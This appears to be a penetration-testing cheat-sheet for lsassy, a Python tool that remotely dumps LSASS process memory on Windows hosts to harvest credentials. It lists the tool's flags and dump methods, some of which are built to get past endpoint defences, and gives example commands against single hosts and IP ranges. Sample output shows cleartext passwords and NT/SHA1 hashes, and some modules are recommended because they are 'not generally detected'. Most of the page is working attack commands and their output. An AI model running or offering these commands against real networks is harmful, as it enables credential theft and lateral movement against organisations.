Lsassy

Remote LSASS dumper - Python library to remotely extract credentials on a set of hosts.

Installation

python3 -m pip install lsassy

Usage

lsassy [-h] [-m DUMP_METHOD] [--dump-path DUMP_PATH] [--dump-name DUMP_NAME] [-e EXEC] [--no-powershell] [--copy] [-O OPTIONS] [--timeout TIMEOUT] [--parse-only] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--port PORT] [--no-pass] [-H HASHES] [-k] [-dc-ip ip address] [-aesKey hex key] [-K KERBEROS_DIR] [-o OUTFILE] [-f {pretty,json,grep,table}] [--users] [-v] [--threads THREADS] [-q] [-V] [target ...]

Flags

lsassy v3.1.0 - Remote lsass dump reader

positional arguments:
  target                The target IP(s), range(s), CIDR(s), hostname(s), FQDN(s), file(s) containing a list of targets

optional arguments:
  -h, --help            show this help message and exit
  -v                    Verbosity level (-v or -vv)
  --threads THREADS     Threads number
  -q, --quiet           Quiet mode, only display credentials
  -V, --version         show program's version number and exit

dump:
  -m DUMP_METHOD, --dump-method DUMP_METHOD
                        Dumping method (comsvcs, comsvcs_stealth, dllinject, dumpert, dumpertdll, edrsandblast, mirrordump, mirrordump_embedded, nanodump, ppldump, ppldump_embedded, procdump, procdump_embedded, rdrleakdiag, wer)
  --dump-path DUMP_PATH
                        Path to store lsass dumpfile (Default: \Windows\Temp)
  --dump-name DUMP_NAME
                        Name given to lsass dumpfile (Default: Random)
  -e EXEC, --exec EXEC  List of execution methods, comma separated (From mmc, smb, smb_stealth, task, wmi)
  --no-powershell       Disable PowerShell
  --copy                Copies cmd or powershell with random name before using it
  -O OPTIONS, --options OPTIONS
                        Dump module options (Example procdump_path=/opt/procdump.exe,procdump=procdump.exe
  --timeout TIMEOUT     Max time to wait for lsass dump (Default 5s)
  --parse-only          Parse dump without dumping

authentication:
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        Plaintext password
  -d DOMAIN, --domain DOMAIN
                        Domain name
  --port PORT           Port (Default: 445)
  --no-pass             Do not provide password (Default: False)
  -H HASHES, --hashes HASHES
                        [LM:]NT hash
  -k, --kerberos        Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
  -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
  -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)

output:
  -K KERBEROS_DIR, --kerberos-dir KERBEROS_DIR
                        Save kerberos tickets to a directory
  -o OUTFILE, --outfile OUTFILE
                        Output credentials to file
  -f {pretty,json,grep,table}, --format {pretty,json,grep,table}
                        Output format (Default pretty)
  --users               Only display user accounts (No computer accounts)

example:
    lsassy -d adsec.local -u pixis -p p4ssw0rd 192.168.1.0/24

Examples

Dump lsass from single target

$ lsassy -d <domain> -u '<domain-admin>or<local-admin>' -p '<password>' <target>

[+] [10.10.10.10] offsec.nl\john.do   Welkom1234

Dump lsass from range of IP’s

$ lsassy -d <domain> -u '<domain-admin>or<local-admin>' -p '<password>' 10.10.10.10-12

[+] [10.10.10.10] offsec.nl\john.do   Welkom1234
[+] [10.10.10.11] offsec.nl\jane.do   Welk0m4
[+] [10.10.10.12] offsec.nl\el.prof   NietWelkom

Dump lsass with module

Modules that can be used without prerequisites and from experience are not generally detected:

  • comsvcs_stealth
  • procdump_embedded
  • mirrordump_embedded
comsvcs_stealth
$ lsassy -d offsec.nl -u john.do -p 'Welkom1234' 10.10.10.10 -m comsvcs_stealth
[+] 10.10.10.10 Authentication successful
[+] 10.10.10.10 Comsvcs.dll successfuly copied
[+] 10.10.10.10 Lsass dumped in C:\Windows\Temp\R0fDNwVOq.ttf (215340545 Bytes)
[+] 10.10.10.10 Lsass dump deleted
[+] 10.10.10.10 OFFSEC\adm_johndo           [NT] 80a2cc87940725[...]562de29 | [SHA1] c58e8057[...]5df5c7d8a10afe5d
[+] 10.10.10.10 OFFSEC\PDC01$    [NT] cb381530[...]45ee76 | [SHA1] e16078f9f6939f0[...]93156b55db
[+] 10.10.10.10 offsec.nl\PDC01$  [PWD] d52be466975b3728c2acc13d9a7422a7b10[...]e0a7795122cb2ee55537
[+] 10.10.10.10 OFFSEC\PDC01$    [NT] 9e333[...]9b27607fc | [SHA1] 3b8152bd[...]2255e3ea72c
[+] 10.10.10.10 offsec.nl\PDC01$  [PWD] c1e3cebd8f9628c752b34ca1290d8771cb159fedb2298219f7[...]28bc2fe4ddc56b0e98a019bb072
Dumpert

URL list